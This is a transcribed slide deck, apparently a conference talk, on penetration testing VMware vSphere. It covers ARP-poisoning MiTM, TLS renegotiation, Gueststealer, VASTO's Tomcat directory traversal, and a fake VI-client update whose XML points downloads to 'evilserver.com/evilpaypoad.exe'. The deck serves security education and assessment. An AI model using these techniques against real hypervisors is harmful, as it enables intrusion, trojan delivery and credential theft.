Pen Testing Methodology Gueststealer TomCat Zero Day Directory Traversal VASTO



Similar documents
VMware: Advanced Security

COURSE NAME: INFORMATION SECURITY INTERNSHIP PROGRAM

Virtually Pwned Pentesting VMware. Claudio

CRYPTUS DIPLOMA IN IT SECURITY

How to hack VMware vcenter server in 60 seconds

CYBERTRON NETWORK SOLUTIONS

The more laws and order are made prominent, the more thieves and robbers there will be. Lao Tzu

Course Title: Course Description: Course Key Objective: Fee & Duration:

Measuring Hypervisor Footprints: Assessing Risk

Professional Penetration Testing Techniques and Vulnerability Assessment ...

Ethical Hacking Course Layout

Certified Ethical Hacker (CEH)

IDS and Penetration Testing Lab ISA656 (Attacker)

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

Cedric Rajendran VMware, Inc. Security Hardening vsphere 5.5

Computer Forensics Training - Digital Forensics and Electronic Discovery (Mile2)

If you know the enemy and know yourself, you need not fear the result of a hundred battles.

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

vsphere Security ESXi 6.0 vcenter Server 6.0 EN

Securing your Virtual Datacenter. Part 1: Preventing, Mitigating Privilege Escalation

Internal Penetration Test

SENSITIVE AUSTRALIAN SPORTS COMMISSION ATHLETE MANAGEMENT SYSTEM (AMS) SMARTBASE SECURITY TEST PLAN. Final. Version 1.0

Vulnerability Assessment and Penetration Testing

Penetration Testing //Vulnerability Assessment //Remedy

Attack Frameworks and Tools

Simple Steps to Securing Your SSL VPN

Certified Ethical Hacker Exam Version Comparison. Version Comparison

Virtualization System Security

JOB ORIENTED VMWARE TRAINING INSTITUTE IN CHENNAI

How to hack VMware vcenter server in 60 seconds

More Practical Projects

Web Application Report

Discovering passwords in the memory

Learn Ethical Hacking, Become a Pentester


vcenter Support Assistant User's Guide

LEARNING COMPUTER SYSTEMS VULNERABILITIES EXPLOITATION THROUGH PENETRATION TEST EXPERIMENTS

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

How to Backup and Restore a VM using Veeam

Active Fabric Manager (AFM) Plug-in for VMware vcenter Virtual Distributed Switch (VDS) CLI Guide

Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!

Threat Intelligence Pty Ltd Specialist Security Training Catalogue

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

S E C U R I T Y A S S E S S M E N T : B o m g a r A p p l i a n c e s

FSP-201: Ethical Hacking & IT Security

VMware vsphere: [V5.5] Admin Training

Topics in Network Security

1. LAB SNIFFING LAB ID: 10

/ Preparing to Manage a VMware Environment Page 1

CEH Version8 Course Outline

CS5008: Internet Computing

Top 10 Database. Misconfigurations.

Khóa học dành cho các kỹ sư hệ thống, quản trị hệ thống, kỹ sư vận hành cho các hệ thống ảo hóa ESXi, ESX và vcenter Server

User Guide for VMware Adapter for SAP LVM VERSION 1.2

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs

TGL VMware Presentation. Guangzhou Macau Hong Kong Shanghai Beijing

vsphere Security ESXi 5.5 vcenter Server 5.5 EN

Certified Ethical Hacker (CEH) Ethical Hacking & Counter Measures Course 9962; 5 Days, Instructor-Led

Course Duration: 80Hrs. Course Fee: INR (Certification Lab Exam Cost 2 Attempts)

Security. Environments. Dave Shackleford. John Wiley &. Sons, Inc. s j}! '**»* t i j. l:i. in: i««;

Exploiting Transparent User Identification Systems

Hardening and Hacking vsphere and Private Cloud Everything you need to know about vsphere Security

Ethical Hacking and Information Security. Foundation of Information Security. Detailed Module. Duration. Lecture with Hands On Session: 90 Hours

Table of Contents. vsphere 4 Suite 24. Chapter Format and Conventions 10. Why You Need Virtualization 15 Types. Why vsphere. Onward, Through the Fog!

Audience. Pre-Requisites

Ethical Hacking as a Professional Penetration Testing Technique

OSMOSIS. Open Source Monitoring Security Issues HACKITO ERGO SUM 2014 / April 2014 / Paris

Hacking the WordpressEcosystem

Course Content Summary ITN 261 Network Attacks, Computer Crime and Hacking (4 Credits)

Demystifying Penetration Testing for the Enterprise. Presented by Pravesh Gaonjur

VMware vsphere: Fast Track [V5.0]

DEPLOYMENT GUIDE Version 1.2. Deploying the BIG-IP v10.2 to Enable Long Distance Live Migration with VMware vsphere vmotion

Building a Penetration Testing Virtual Computer Laboratory

Installing and Configuring vcenter Multi-Hypervisor Manager

VMware vcenter Log Insight Security Guide

ITEC441- IS Security. Chapter 15 Performing a Penetration Test

The Nexpose Expert System

Penetration Testing Using The Kill Chain Methodology

S E C U R I T Y A S S E S S M E N T : B o m g a r B o x T M. Bomgar. Product Penetration Test. September 2010

Presentation for ISACA Chapter NL. Auditing Virtual Servers. VMware: Security and Operations. Gert-Jan Timmer 3. September, 2012

The Risks that Pen Tests don t Find. OWASP 13 April The OWASP Foundation

Managing Multi-Hypervisor Environments with vcenter Server

Metasploit The Elixir of Network Security

Hack Your SQL Server Database Before the Hackers Do

Windows Attack - Gain Enterprise Admin Privileges in 5 Minutes

Best Practices in Virtualization & Cloud Security with Symantec DCS

Passing PCI Compliance How to Address the Application Security Mandates

Patch Management. Module VMware Inc. All rights reserved

Network Penetration Testing and Ethical Hacking Scanning/Penetration Testing. SANS Security Sans Mentor: Daryl Fallin

VMware Security Briefing. Rob Randell, CISSP Senior Security Specialist SE

Table of Contents. Online backup Manager User s Guide

VMware vsphere: Install, Configure, Manage [V5.0]

Security Considerations White Paper for Cisco Smart Storage 1

Secure Messaging Server Console... 2

Sample Report. Security Test Plan. Prepared by Security Innovation

Web Application Hacking (Penetration Testing) 5-day Hands-On Course

Penetration Testing. ISACA - Atlanta

Ethical Hacking v7 40 H.

The Virtualization Security Landscape: What's Changed?

Transcription:

Does vsphere really have some major issues? Recent Cases involving VMware Pen Testing Methodology Gueststealer TomCat Zero Day Directory Traversal VASTO Mitigation Techniques Future Concerns?

VMware 80% of the Market Share Do the Tools used in Pen Testing work with virtualization? Are there hacks being designed just for VMware? What is this costing us? VMware moving away from ESX to VMware Hypervisor (ESXi)

VMware ESX Hypervisor VMware ESXi Type1 Hypervisor SC L2 Switch L2 Switch Posix Shell Provided by The Virtualization Practice.com

ESX ESXi Provided by The Virtualization Practice.com

What are the main security concerns associated with virtualization in general? Segregation of Duties Accounting/Logging New API s VMsafe vstorage vnetwork VMsafe Virtual Appliances Plug Ins Share Resources can they be attacked? Memory, CPU, Datastore

Threats Perceived Known Risks Probability Potential Impact

It is really a hardened Linux Kernel. It is still just another layer to attack! Common management errors ARP Cache Poisoning Update Manager SSLv3/TLS Renegotiation Web Server Vulnerability Many we know of Today Full on Exploits Metasploit and Exploit DB

Secunia Historic Advisories ESX 4.x ESXi 4.x vcenter Server 4.x nvd.nist.gov Over 40 Vulnerabilities for VMware Products McAfee Threats VMware ESX Server Heap Buffer Overflow vcenter Update Manager CSS vcenter Update Manager Directory Traversal

I can t tell you how many times I was asked to delay a pen test because the client was not READY??? What is that? When was the last time a hacker asked if you were ready before he attacked you. What is your current posture? How secure are you? How you empowered your people to do the correct things?

This does not change, regardless of the environment being tested. Information Gathering Scanning Enumeration Penetration Fail Start Over or tell them great job Succeed Escalate Privileges Steal Data or Leave proof of hack Cover Tracks Leave Backdoors

Google NMAP Since v4.8 Ettercap Cain and Abel Metasploit Claudio Criscione VASTO Virtualization ASsessment TOolkit

We have to find the systems first. Just like any other service, ESX has its own tells. NMAP will give you what you need. Lets see this in action!

ESX Sever SSL request SSL reply (Fake certificate) F&JLMDHGST*KU Stop Copy & Alter Cleartext SSL request SSL reply (Real Self Signed Cert) P)JDGH$FDSD@ ARP Cache Poisoning will allow us to perform a successful SSL crack! The hacking tools will create fake certificates. Two simultaneous SSL connections are established. One between the victim and the hacker, the other between the hacker and the real server. The communication process starts on port 443 and once the SSL authentication has been established VMware moves the communication to port 902.

VIC Client Login

You are still vulnerable even if you use vcenter. I can offer this: Once the above password is stolen you can login to the host with the vpxuser and above password.

ESX Sever STEP 1 Client Attacker Server (HTTPS) 1 TLS Handshake Session #1 (client <> server)

ESX Sever STEP 2 Client Attacker Server (HTTPS) 1.1 1.2 2 TLS Handshake Session #2 (attacker <> server) Attacker sends application layer command of his choice Renegotiation is triggered

ESX Sever STEP 3 Client Attacker Server (HTTPS) 3 TLS Handshake Session #1 continued (client<>server) Within the encrypted session #2 (attacker<>server) 4 Client data is encrypted within session #1 (Green) (The attacker cannot read/manipulate this data), previous data (1,2) prefixed to newly sent clientdata

Yes No

VMINVENTORY.XML /etc/vmware/hostd/vminventory.xml (default location) Gives us Guest inventory & location information

GUEST.VMX &.VMDK.vmx gives us Guest config and file locations.vmdk (disk image) can point to other.vmdk images

Let s See the Gueststealer in Action!

The nasty MiTM Attack!

VI luker The Auto Update Process <patchversion>3.0.0</patchversion> <apiversion>3.1.0</apiversion> <downloadurl>https://*/client/vmwareviclient.exe</downloadurl> The Evil Guy <patchversion>10.0.0</patchversion> <apiversion>3.1.0</apiversion> <downloadurl>https://evilserver.com/evilpaypoad.exe</do wnloadurl>

Change the clients.xml filename The package will run inder the user s priviledge! Administrator Anyone? Provide your nasty trojan package. Could be combined with other attacks. Create a fake web interface so you look ligit! This can be done as MiTM or Rouge Server You will trigger a certificate error Let s See this one in action! We are Troopers!

Autopwn How easy can it get? Uses a flaw in the Tomcat Web Server Transfers the Latest Session File from vcenter using a Directory Traversal Attack. Dictionary Attack How Large is your dictionary file? Fingerprinting Tool Need to know exactly what is running?

Any user that can access the Server get Admin access to the server! VMware is using an old version of TomCat that leaves the username and password in a world readable file!

Must be Trunked Ports if VLANs used

Race Conditions? VMsafe? DataStores? Other Plugins?